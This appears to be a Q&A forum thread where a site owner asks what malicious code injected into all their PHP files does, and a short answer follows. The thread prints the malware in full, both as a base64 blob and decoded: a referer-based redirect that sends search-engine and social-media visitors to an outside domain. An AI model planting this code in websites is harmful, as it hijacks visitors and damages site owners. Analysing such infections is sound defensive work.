Home/ Questions/Q 7580415
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-30T17:54:43+00:00

This February 14 my website got attacked by some malware code which comes to

  • 0

This February 14 my website got attacked by some malware code which comes to my notice after google’s Action on 29th Feb But All php files have got effected with the malicious code on checking i got the following code

echo
base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9”);

on decoding it become

error_reporting(0); $qazplm = headers_sent(); if (!$qazplm) {
$referer = $_SERVER[‘HTTP_REFERER’];
$uag = $_SERVER[‘HTTP_USER_AGENT’];
if ($uag) {
if (stristr($referer, “yahoo”) or stristr($referer, “bing”) or stristr($referer, “rambler”) or stristr($referer, “gogo”) or
stristr($referer, “live.com”) or stristr($referer, “aport”) or
stristr($referer, “nigma”) or stristr($referer, “webalta”) or
stristr($referer, “begun.ru”) or stristr($referer, “stumbleupon.com”)
or stristr($referer, “bit.ly”) or stristr($referer, “tinyurl.com”) or
preg_match(“/yandex.ru/yandsearch\?(.*?)\&lr\=/”, $referer) or
preg_match(“/google.(.*?)/url/”, $referer) or stristr($referer,
“myspace.com”) or stristr($referer, “facebook.com”) or
stristr($referer, “aol.com”)) {
if (!stristr($referer, “cache”) or !stristr($referer, “inurl”)) {
header(“Location: http://namesti.bee.pl/“);
exit();
}
}
} }

i dont know how it came to my server but All php files have got effected but others are fine.entire web site is down now. i Just want to know how much harm it can do And What this code does exactly. How can i detect it. Is it the script which executes on particular time.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    The script just attempts to redirect to namesti.bee.pl depending on whether headers have already been sent or not, and what the referer string contains.

    It doesn’t do anything else, so the harm done is on your site’s reputation more than anything else.

    • 0